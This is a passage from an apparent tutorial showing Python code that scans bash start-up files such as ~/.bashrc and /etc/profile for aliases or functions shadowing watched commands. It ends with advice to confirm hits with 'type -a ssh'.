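STARTUP_FILES = ("~/.bashrc", "~/.bash_profile", "~/.profile", "~/.bash_aliases",
                 "/etc/bash.bashrc", "/etc/profile")


def scan_startup_files(paths=STARTUP_FILES) -> dict[str, list[tuple[int, str, str]]]:
    """Run shell_overrides over the real start-up files; missing files are skipped."""
    report = {}
    for p in paths:
        full = os.path.expanduser(p)
        if os.path.isfile(full):
            with open(full, encoding="utf-8", errors="replace") as fh:
                hits = shell_overrides(fh.read())
            if hits:
                report[full] = hits
    return report


if __name__ == "__main__":
    for n, kind, name in shell_overrides(SAMPLE_BASHRC):
        print(f"line {n}: {kind} {name}")
    print(scan_startup_files() or "no watched commands are shadowed")
```

A parser of the file is only half the picture, since a definition can be sourced from anywhere; in a live shell, `type -a ssh` shows whether the name currently resolves to an alias, a function or the binary, and is the quickest confirmation once a file hit is found.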